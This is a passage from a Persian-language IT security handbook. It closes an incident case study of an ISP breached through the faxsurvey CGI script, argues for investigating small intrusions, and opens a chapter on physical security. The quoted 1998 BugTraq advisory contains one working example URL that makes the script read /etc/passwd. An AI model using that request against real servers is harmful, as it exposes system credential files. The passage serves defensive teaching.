‫ﺗﺤﻘﻴﻘﺎﺗﻲ ﺭﺍ ﺷﺮﻭﻉ ﻛﻨﺪ ﻻﺯﻡ ﺍﺳﺖ ﺑﻴﺶ ﺍﺯ ﺳﻘﻒ ﻫﺸﺖ ﻫﺰﺍﺭ ﺩﻻﺭ ﺧﺴﺎﺭﺕ ﺩﻳﺪﻩ ﺑﺎﺷﺪ‪ .‬ﭼﻮﻥ ﻣﻴﺰﺍﻥ ﺧـﺴﺎﺭﺕ ﺑـﻪ ﺍﻳـﻦ ﺳـﻘﻒ ﺣـﺪﺍﻗﻠﻲ‬
‫ﻧﺮﺳﻴﺪﻩ ﺑﻮﺩ‪ ،‬ﻫﻴﭻ ﺗﺠﺴﺴﻲ ﺷﺮﻭﻉ ﻧﺸﺪ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﺩﻟﻴﻞ ﻭﺟﻮﺩ ﭼﻨﻴﻦ ﺣﺪﺍﻗﻞﻫﺎﻳﻲ ﻗﺎﺑﻞ ﺩﺭﻙ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺑﻪ ﺩﻭ ﺩﻟﻴﻞ ﻋﻤﺪﻩ ﺑﻬﺘﺮ ﺍﺳﺖ‬
‫ﺍﻳﻨﮕﻮﻧﻪ ﻧﺒﺎﺷﺪ‪:‬‬
‫•‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺣﻤﻠﻪﻫﺎ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻤﺎﻥ ﻧﺴﺒﺘﹰﺎ ﺟﻮﺍﻥ ﻫﺪﺍﻳﺖ ﻣﻲﺷﻮﺩ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﺩﺭﻳﺎﻓﺖ ﻳﻚ ﺍﺧﻄﺎﺭﻳﻪ ﻳﺎ ﺣﺪﺍﻛﺜﺮ ﻳـﻚ ﺣﻜـﻢ‬
‫ﺗﻌﻠﻴﻖ‪ ،‬ﭼﻨﻴﻦ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﺭﺍ ﻣﺘﻮﻗﻒ ﻛﻨﻨﺪ‪ .‬ﻓﻘﺪﺍﻥ ﺗﺠﺴﺲ ﺭﺳﻤﻲ ﻭ ﭘﻴﮕﻴﺮﻱ ﺻـﺮﻓﹰﺎ ﺍﻳـﻦ ﻣﻬﺎﺟﻤـﺎﻥ ﺭﺍ ﺗـﺸﻮﻳﻖ ﻣـﻲﻛﻨـﺪ ﻛـﻪ ﺑـﻪ‬
‫ﺟﺮﻣﻬﺎﻱ ﺑﺰﺭﮔﺘﺮ ﻭ ﺑﺰﺭﮔﺘﺮ ﺑﭙﺮﺩﺍﺯﻧﺪ ﺗﺎ ﺍﻳﻨﻜﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺧﺴﺎﺭﺗﻬﺎﻱ ﺟﺪﻱ ﺑﺪﻭﺷﺸﺎﻥ ﺑﻴﻔﺘﺪ‪.‬‬
‫•‬
‫ﻻ ﺑـﺎ ﻋـﺪﻡ ﺗﻮﺟـﻪ ﺳـﺎﻳﺮﻳﻦ ﻣﻮﺍﺟـﻪ‬
‫ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻬﺎﺟﻢ ﺑﺴﻴﺎﺭ ﺧﺒﺮﻩ ﺑﺎﺷﺪ ﻭ ﺩﺭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺩﻳﮕﺮ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﻲﺷﻮﺩ ﺩﺳﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﻣﻮﺍﺭﺩ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎﺯﺭﺳﻴﻬﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺍﺯ ﺟﺮﺍﺋﻢ ﻛﻮﭼﻚ‪ ،‬ﺩﻭﺍﻳﺮ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺭﺍ ﺑﻪ ﺳـﻤﺖ‬
‫ﺟﺮﺍﺋﻢ ﺑﺰﺭﮒ ﺍﻗﺘﺼﺎﺩﻱ ﻫﺪﺍﻳﺖ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﻳﻚ ﺍﺧﺘﻼﻑ ﺣﺴﺎﺑﺮﺳﻲ ‪ ۷۵‬ﺳﻨﺘﻲ ﺑﺎﻋﺚ ﺷـﺪ ﻛـﻪ ﻛﻠﻴـﻒ ﺍﺳـﺘﻮﻝ‪ ٥٠‬ﻳـﻚ‬
‫ﻧﻔﻮﺫﮔﺮ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍ ﺭﺩﻳﺎﺑﻲ ﻛﻨﺪ ﻛﻪ ﺳﺮﺍﻧﺠﺎﻡ ﻣﺸﺨﺺ ﺷﺪ ﺑﻪ ﺩﺳﺘﻮﺭ ﺍﺗﺤﺎﺩ ﺟﻤﺎﻫﻴﺮ ﺷﻮﺭﻭﻱ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺗﺠﺎﺭﻱ ﻭ ﻧﻈﺎﻣﻲ ﺍﻳﺎﻻﺕ‬
‫ﻣﺘﺤﺪﻩ ﻧﻔﻮﺫ ﻛﺮﺩﻩ ﺍﺳﺖ‪) .‬ﺩﺍﺳﺘﺎﻧﻲ ﻛﻪ ﺟﺰﺋﻴﺎﺕ ﺁﻥ ﺩﺭ ﻧﻤﺎﻳﺸﻨﺎﻣﻪ ﭘﻠﻴﺴﻲ "ﻧﻔﻮﺫﮔﺮ ﻛﻼﺳﻴﻚ"‪ ٥١‬ﺍﺳﺘﻮﻝ؛ "ﺗﺨﻢ ﻣﺮﻍ ﻛﺎﻛﻮ"‪ ٥٢‬ﺁﻣﺪﻩ ﺍﺳﺖ‪(.‬‬
‫ﻭﻗﺘﻲ ﻣﺴﺌﻠﻪ ﺭﻭﺷﻦ ﺷﺪ‪ ،‬ﻣﻌﻠﻮﻡ ﺷﺪ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺩﺭ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻣﺮﺑﻮﻁ ﺑﻪ ‪ faxsurvey‬ﺣﺪﻭﺩ ﺳﻪ ﻣﺎﻩ ﻗﺒـﻞ ﺍﺯ ﺍﻧﺠـﺎﻡ ﺣﻤﻠـﻪ ﺩﺭ ﮔـﺮﻭﻩ‬
‫ﭘﺴﺘﻲ ‪ BugTraq‬ﮔﺰﺍﺭﺵ ﺷﺪﻩ ﺑﻮﺩ‪ .‬ﻳﺎ ﻛﺴﻲ ﺍﺯ ﻛﺎﺭﻛﻨﺎﻥ ‪ ISP‬ﭘﻴﺎﻣﻬﺎﻱ ﮔﺮﻭﻩ ﭘﺴﺘﻲ ‪ BugTraq‬ﺭﺍ ﻧﺨﻮﺍﻧﺪﻩ ﺑﻮﺩ‪ ،‬ﻳﺎ ﺍﻳﻨﻜﻪ ﻛـﺴﻲ ﺧﺒـﺮ‬
‫ﻧﺪﺍﺷﺖ ﻛﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻣﺮﺑﻮﻁ ﺑﻪ ‪ faxsurvey‬ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﻧﺼﺐ ﺷﺪﻩ ﺍﺳﺖ‪:‬‬
‫‪Tue, 4 Aug 1998 07:41:24 -0700‬‬
‫‪[email protected]‬‬
‫>‪Tom <[email protected]‬‬
‫‪remote exploit in faxsurvey cgi-script‬‬
‫‪Date:‬‬
‫‪Reply-To:‬‬
‫‪From:‬‬
‫‪Subject:‬‬
‫!‪Hi‬‬
‫‪There exist a bug in the 'faxsurvey' CGI-Script, which allows an attacker to execute any‬‬
‫‪command s/he wants with the permissions of the HTTP-Server.‬‬
‫‪All S.u.S.E. 5.1 and 5.2 Linux Dist. (and I think also older ones) with the HylaFAX package‬‬
‫‪installed are vulnerable to this attack.‬‬
‫‪AFAIK the problem exists in the call of 'eval'.‬‬
‫>‪I notified the S.u.S.E. team (suse.de) about that problem. Burchard Steinbild <[email protected]‬‬
‫‪told me, that they have not enough time to fix that bug for their 5.3 Dist., so they decided to just‬‬
‫‪remove the script from the file list.‬‬
‫ﭘﺲ ﺍﺯ ﺗﻬﺎﺟﻢ‪ ISP ،‬ﺗﻤﻴﺰﻛﺎﺭﻱﻫﺎﻱ ﺯﻳﺮ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﺍﺩ‪:‬‬
‫‪Cliff Stoll‬‬
‫‪Classic Hacker‬‬
‫‪The Cuckoo's Egg‬‬
‫‪50‬‬
‫‪51‬‬
‫‪52‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫‪All the attacker has to do is type http://joepc.linux.elsewhere.org/cgi‬‬‫‪bin/faxsurvey?/bin/cat%20/etc/passwd in his favorite Web-Browser to get a copy of your‬‬
‫‪Password-File.‬‬
‫‪٢٧٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫•‬
‫ﻳﻚ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻓﻮﺭﻱ ﺍﺯ ﻫﻤﻪ ﺩﻳﺴﻜﻬﺎ ﺗﻬﻴﻪ ﺷﺪ‪ .‬ﺍﻳﻦ ﭘﺸﺘﻴﺒﺎﻥ ﺑﻌﻨﻮﺍﻥ ﺷﺎﻫﺪﻱ ﺑﺮ ﻛﺸﻒ ﺍﻳﻦ ﺗﺨﺮﻳﺐ ﻛـﻪ ﻧﻴـﺎﺯ ﺑـﻪ ﭘﻴﮕﻴـﺮﻱ‬
‫ﺩﺍﺷﺖ ﻧﮕﻬﺪﺍﺭﻱ ﺷﺪ‪.‬‬
‫•‬
‫ﺳﻴﺴﺘﻢ ﺑﺪﻧﺒﺎﻝ ﻓﺎﻳﻠﻬﺎﻱ ﺑﺎ ﻣﺠﻮﺯﻫﺎﻱ ﺟﺪﻳﺪ ﭘﻮﻳﺶ ﺷﺪ‪ .‬ﻫﻴﭻ ﻓﺎﻳﻠﻲ ﭘﻴﺪﺍ ﻧﺸﺪ‪.‬‬
‫•‬
‫ﺩﺳﺘﺮﺳﻴﻬﺎ ﺩﺭ ﺷﺎﺧﻪ ‪ /usr/include‬ﻭ ﻛﺎﻣﭙﺎﻳﻠﺮ ‪ C‬ﻃﻮﺭﻱ ﺗﻐﻴﻴﺮ ﻳﺎﻓﺖ ﻛﻪ ﺗﻨﻬﺎ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺍﻳﻦ ﻓﺎﻳﻠﻬـﺎ ﺩﺳﺘﺮﺳـﻲ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﻨﺪ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺟﺪﻳﺪ ﺭﺍ ﻛﺎﻣﭙﺎﻳﻞ ﻛﻨﻨﺪ‪.‬‬
‫•‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﻠﻴﺪﻱ ﺑﺎ ﻧﺴﺨﻪ ﻣﻨﺘﺸﺮﺷﺪﺓ ﺍﻭﻟﻴﻪ ﺭﻭﻱ ﺩﻳﺴﮑﻬﺎﻱ ﻓﺸﺮﺩﻩ ﻣﻘﺎﻳﺴﻪ ﺷﺪﻧﺪ ﺗﺎ ﺗﻐﻴﻴﺮﺍﺕ ﺍﺣﺘﻤﺎﻟﻲ ﻣـﺸﺨﺺ ﺷـﻮﺩ‪ .‬ﺩﺭ ﺁﻧﻬـﺎ‬
‫ﺗﻐﻴﻴﺮﻱ ﺍﻳﺠﺎﺩ ﻧﺸﺪﻩ ﺑﻮﺩ‪.‬‬
‫•‬
‫ﻫﻤﺔ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺑﻄﻮﺭ ﺩﺳﺘﻲ ﺑﺮﺍﻱ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﺿﺎﻓﻪ ﻣﺸﻜﻮﻙ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻨﺪ‪ .‬ﻣﻮﺭﺩﻱ ﭘﻴﺪﺍ ﻧﺸﺪ‪.‬‬
‫•‬
‫ﭘﺲ ﺍﺯ ﻳﻚ ﻫﻔﺘﻪ ﺿﺎﺑﻄﺔ ﻣﺴﻴﺮﻳﺎﺏ ﻛﻪ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ‪ SplitRock‬ﺭﺍ ﻣﺴﺪﻭﺩ ﻣﻲﻛﺮﺩ ﻟﻐﻮ ﺷﺪ‪.‬‬
‫‪٢٧٩‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫ﻓﺼﻞ ﺳﻮﻡ‬
‫ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ" ﻫﻤﺔ ﻛﺎﺭﻫﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﭘﻴﺶ ﺍﺯ ﺗﺎﻳﭗ ﻓﺮﺍﻣﻴﻦ ﺭﻭﻱ ﺻﻔﺤﻪﻛﻠﻴﺪ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ؛ ﻣﺜﻞ ﺳﺎﺧﺘﻦ ﺳﻴﺴﺘﻢ ﺍﻋﻼﻡ ﺧﻄـﺮ‪ ،‬ﻗﻔـﻞ‬
‫ﻛﺮﺩﻥ ﻳﻚ ﻛﻠﻴﺪ ﺭﻭﻱ ﻣﻨﺒﻊ ﺑﺮﻕ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﺍﺗﺎﻗﻚ ﻗﻔﻞﺷﺪﻩ ﻭ ﻣﺠﻬﺰ ﺑﻪ ﺩﻭﺭﺑﻴﻦ ﻣﺪﺍﺭﺑﺴﺘﺔ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﻭ ﻣﻘﺴﻢﻫﺎﻱ ﺑﺮﻕ ﻭ ﻣﻨﺒﻊ ﺑﺮﻕ ﻭﻗﻔﻪﻧﺎﭘـﺬﻳﺮ‬
‫)‪ .٥٣(UPS‬ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﻣﺴﺌﻠﻪ ﺑﺴﻴﺎﺭ ﻣﻬﻤﻲ ﺍﺳﺖ ﻏﺎﻟﺒﹰﺎ ﻧﺎﺩﻳﺪﻩ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ‪ .‬ﺍﻳﻦ ﻓﺼﻞ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺍﻣﻨﻴـﺖ‬
‫ﻓﻴﺰﻳﻜﻲ ﺭﺍ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ‪ ،‬ﺍﺯ ﺟﻤﻠﻪ ﺧﻄﺮﺍﺕ ﻣﺤﻴﻄﻲ‪ ،‬ﺧﺮﺍﺑﻜﺎﺭﻱ ﻭ ﺳﺮﻗﺖ؛ ﻭ ﭘﻴﺸﻨﻬﺎﺩﺍﺗﻲ ﺑﺮﺍﻱ ﻧﺤـﻮﺓ ﺑﺮﺧـﻮﺭﺩ ﺑـﺎ ﺁﻧﻬـﺎ ﺍﺭﺍﺋـﻪ‬
‫ﻣﻲﻛﻨﺪ‪.‬‬
‫ﻋﻨﺎﺻﺮ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ‬
‫ﺍﻭﻝ ﻣﺮﺩﻡ‬
‫ﻧﻴﺎﺯ ﺑﻪ ﺗﺄﻛﻴﺪ ﻧﻴﺴﺖ ﻛﻪ ﺩﺭ ﺷﺮﺍﻳﻂ ﺍﺿﻄﺮﺍﺭﻱ ﻭ ﺳﻮﺍﻧﺢ‪ ،‬ﺯﻧﺪﮔﻲ ﻭ ﺍﻳﻤﻨﻲ ﭘﺮﺳﻨﻞ ﻫﻤﻮﺍﺭﻩ ﺑﺎﻳﺪ ﺑﺮ ﺩﺍﺩﻩﻫﺎ ﻳﺎ ﺗﺠﻬﻴﺰﺍﺕ ﻣﺪ ﻧﻈﺮ ﻣﻘﺪﻡ ﺑﺎﺷـﺪ‪.‬‬
‫ﺍﮔﺮﭼﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺍﻳﻦ ﺍﺻﻞ ﺍﺳﺘﺜﻨﺎﻫﺎﻱ ﺑﺴﻴﺎﺭ ﻣﺤﺪﻭﺩﻱ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ )ﻣﺜ ﹰﻼ ﺩﺭ ﺷﺮﺍﻳﻂ ﺣﺴﺎﺱ ﻧﻈﺎﻣﻲ(‪ ،‬ﺍﻣﺎ ﻫﻴﭽﮕﺎﻩ ﻧﺒﺎﻳﺪ ﺁﻧﭽﻪ‬
‫ﺭﺍ ﻛﻪ ﺣﻘﻴﻘﺘﹰﺎ ﻏﻴﺮﻗﺎﺑﻞ ﺟﺎﻳﮕﺰﻳﻨﻲ ﺍﺳﺖ ﺍﺯ ﻧﻈﺮ ﺩﻭﺭ ﺩﺍﺷﺖ‪.‬‬
‫ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺑﺮﺍﻱ ﺗﻬﺪﻳﺪﺍﺕ ﻓﺮﺍﻣﻮﺵﺷﺪﻩ‬
‫ﺳﺎﻳﺮ ﺳﺎﺯﻣﺎﻧﻬﺎ ﮔﻤﺎﻥ ﻣﻲﻛﻨﻨﺪ ﻣﻮﺍﺟﻬﺔ ﺻﺤﻴﺢ ﺑﺎ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩ ﻳﺎ ﻣﺸﻜﻞ ﺍﺳﺖ‪ .‬ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻤﻲ ﺗﻮﺍﻧﺎﻳﻲ ﺁﻧﺮﺍ ﺩﺍﺭﻧـﺪ ﻛـﻪ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺣﻤﻼﺕ ﻫﺴﺘﻪﺍﻱ‪ ،‬ﺯﻣﻴﻦﻟﺮﺯﻩﻫﺎﻱ ﺑﺰﺭﮒ‪ ،‬ﻳﺎ ﺑﻤﺐﮔﺬﺍﺭﻱﻫﺎﻱ ﺗﺮﻭﺭﻳﺴﺘﻲ ﺣﻔﺎﻇﺖ ﻛﻨﻨﺪ؛ ﺍﻣﺎ ﻫﺮﮔﺰ ﻧﺒﺎﻳﺪ ﺑـﻪ‬
‫ﺑﻬﺎﻧﺔ ﺧﻨﺜﻲ ﺷﺪﻥ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻓﺎﺟﻌﻪﺁﻣﻴﺰ‪ ،‬ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﺍﺯ ﺍﻧﺠﺎﻡ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺩﻗﻴﻖ ﺑﺮﺍﻱ ﻣﻮﺍﺭﺩ ﻧﺎﮔﻮﺍﺭ ﺑﺎﺯ ﺩﺍﺭﻳﻢ‪.‬‬
‫‪Uninterruptable Power Supply‬‬
‫‪53‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﺑﺎ ﻛﻤﺎﻝ ﺗﻌﺠﺐ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﻪ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺗﻮﺟﻬﻲ ﻧﺪﺍﺭﻧﺪ‪ .‬ﻳﻚ ﻛﺎﻧﻮﻥ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺩﺭ ﻧﻴﻮﻳﻮﺭﻙ ﻛﻪ ﺩﺍﺋﻤـﹰﺎ ﻣـﻮﺭﺩ ﺩﺳـﺘﺒﺮﺩ‬
‫ﻗﺮﺍﺭ ﻣﻲﮔﺮﻓﺖ ﺩﻫﻬﺎ ﻫﺰﺍﺭ ﺩﻻﺭ ﺩﺭ ﺯﻣﻴﻨﺔ ﺁﺯﻣﺎﻳﺸﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻛﺮﺩ ﺗﺎ ﺍﺯ ﻭﺭﻭﺩﻫﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺩﺭ ﺧﻼﻝ ﺭﻭﺯ ﺟﻠـﻮﮔﻴﺮﻱ‬
‫ﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﻌﺪ ﺍﺯ ﻣﺪﺗﻲ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪ ﻛﻪ ﻣﺸﮑﻞ ﺁﻧﺠﺎ ﺍﺳﺖ ﮐﻪ ﺷﺒﻬﺎ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻧﻈﺎﻓﺘﭽﻲ ﺳﺎﻟﻦ ﻛﺎﻣﭙﻴﻮﺗﺮ ﺭﺍ ﺗﻤﻴﺰ ﻣـﻲﻛﻨـﺪ ﺩﺭﻫـﺎﻱ‬
‫ﻭﺭﻭﺩﻱ ﺁﻧﺮﺍ ﺑﺎﺯ ﻣﻲﮔﺬﺍﺭﺩ‪ .‬ﻣﺠﻠﻪﺍﻱ ﺩﺭ ‪ San Francisco‬ﺩﺭ ﻃﻮﻝ ﻳﻚ ﺭﻭﺯ ﺗﻌﻄﻴﻞ ﻣﻌﺎﺩﻝ ﺑﻴﺶ ﺍﺯ ﻳﻜﺼﺪ ﻫﺰﺍﺭ ﺩﻻﺭ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﺶ ﺑﻪ‬
‫ﺳﺮﻗﺖ ﺭﻓﺘﻨﺪ‪ ،‬ﭼﻮﻥ ﻳﻜﻲ ﺍﺯ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺍﺯ ﻛﺎﺭﺕ ﻛﻠﻴﺪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺑﺮﺍﻱ ﺑﺎﺯ ﻛﺮﺩﻥ ﺩﺭﺏ ﺳﺎﺧﺘﻤﺎﻥ ﻭ ﺍﺯ ﻛﺎﺭ ﺍﻧـﺪﺍﺧﺘﻦ ﺳﻴـﺴﺘﻢ ﺍﻋـﻼﻡ‬
‫ﺧﻄﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺑﻮﺩ‪ .‬ﺍﻳﻦ ﻓﺮﺩ ﭘﺲ ﺍﺯ ﻭﺭﻭﺩ ﺑﻪ ﺳﺎﺧﺘﻤﺎﻥ ﺑﻪ ﻣﻮﺗﻮﺭﺧﺎﻧﻪ ‪ -‬ﺟﺎﻳﻲ ﻛﻪ ﺳﻴﺴﺘﻢ ﺍﻋﻼﻡ ﺧﻄﺮ ﺩﺭ ﺁﻧﺠـﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ‪ -‬ﺭﻓﺘـﻪ‬
‫ﺑﻮﺩ؛ ﻭ ﮔﺰﺍﺭﺵ ﻣﻜﺘﻮﺏ ﺭﺍ ﻧﻴﺰ ﺍﺯ ﭼﺎﭘﮕﺮ ﺩﺳﺘﮕﺎﻩ ﺍﻋﻼﻡ ﺧﻄﺮ ﺑﻴﺮﻭﻥ ﻛﺸﻴﺪﻩ ﻭ ﻣﻨﻬﺪﻡ ﻛﺮﺩﻩ ﺑﻮﺩ‪.‬‬
‫‪٢٨٠‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻼ ﺑﺮﺍﻱ ﭘﺎﻳﮕﺎﻫﻬﺎ ﻳﺎ ﻣﺆﺳـﺴﺎﺕ ﻣﺨﺘﻠـﻒ‪ ،‬ﻣﺘﻔـﺎﻭﺕ‬
‫ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺷﺎﻣﻞ ﺁﻧﻬﺎ ﻣﻲﺷﻮﺩ ‪ -‬ﺗﻬﺪﻳﺪﻫﺎ‪ ،‬ﺗﺠﺎﺭﺏ‪ ،‬ﻭ ﺣﻔﺎﻇﻬﺎ ‪ -‬ﻋﻤ ﹰ‬
‫ﻫﺴﺘﻨﺪ‪ .‬ﭼﻮﻥ ﻫﺮ ﭘﺎﻳﮕﺎﻩ ﺑﺎ ﭘﺎﻳﮕﺎﻩ ﺩﻳﮕﺮ ﺗﻔﺎﻭﺕ ﺩﺍﺭﺩ‪ ،‬ﺍﻳﻦ ﻓﺼﻞ ﻧﻤﻲﺗﻮﺍﻧﺪ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺗﻮﺻﻴﻪﻫﺎﻱ ﺧﺎﺹ ﺭﺍ ﺍﺭﺍﺋﻪ ﻛﻨﺪ ﻭ ﺗﻨﻬﺎ ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﻳﻚ ﻧﻘﻄﻪ ﺷﺮﻭﻉ‪ ،‬ﻳﻚ ﻓﻬﺮﺳﺖ ﺍﺯ ﻣﺴﺎﺋﻞ ﻗﺎﺑﻞ ﻣﻼﺣﻈﻪ‪ ،‬ﻭ ﻳﻚ ﺭﻭﻳﻪ ﭘﻴﺸﻨﻬﺎﺩﻱ ﺑﺮﺍﻱ ﻓﺮﻣﻮﻝﺑﻨﺪﻱ ﺑﺮﻧﺎﻣﻪ ﻭﺍﻗﻌﻲ ﺍﺭﺍﺋﻪ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ‬
‫ﺍﻭﻟﻴﻦ ﮔﺎﻡ ﺍﻳﻤﻦﺳﺎﺯﻱ ﻓﻴﺰﻳﻜﻲ ﺗﺄﺳﻴﺴﺎﺕ ﺷﻤﺎ ﻓﺮﻣﻮﻝﺑﻨﺪﻱ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻣﻜﺘﻮﺏ ﺍﺳﺖ ﻛﻪ ﻧﻴﺎﺯﻫﺎﻱ ﻓﻌﻠﻲ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﻭ ﺳﻤﺖ ﻭ ﺳﻮﻱ‬
‫ﻣﻮﺭﺩ ﻧﻈﺮ ﺷﻤﺎ ﺩﺭ ﺁﻳﻨﺪﻩ ﺭﺍ ﻧﺸﺎﻥ ﺩﻫﺪ‪ .‬ﺑﻄﻮﺭ ﺍﻳﺪﻩﺁﻝ‪ ،‬ﺑﺮﻧﺎﻣﺔ ﻓﻴﺰﻳﻜﻲ ﺑﺎﻳﺪ ﺑﺨﺸﻲ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻜﺘـﻮﺏ ﺷـﻤﺎ ﺑﺎﺷـﺪ‪ .‬ﺍﻳـﻦ ﻃـﺮﺡ‬
‫ﺑﺮﺍﻱ ﺗﻜﺎﻣﻞ ﻻﺯﻡ ﺍﺳﺖ ﺗﻮﺳﻂ ﺳﺎﻳﺮ ﺍﻋﻀﺎ ﺧﻮﺍﻧﺪﻩ ﺷﻮﺩ‪ ،‬ﻭ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺗﺄﻳﻴﺪ ﻣﺪﻳﺮﻳﺖ ﺍﺭﺷﺪ ﺳﺎﺯﻣﺎﻥ ﻧﻴﺰ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﺪﻑ ﺍﺯ ﺑﺮﻧﺎﻣﻪ‪،‬‬
‫ﻫﻢ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻭ ﻫﻢ ﺍﺗﺨﺎﺫ ﺗﺪﺍﺑﻴﺮ ﺳﻴﺎﺳﻲ ﺍﺳﺖ‪.‬‬
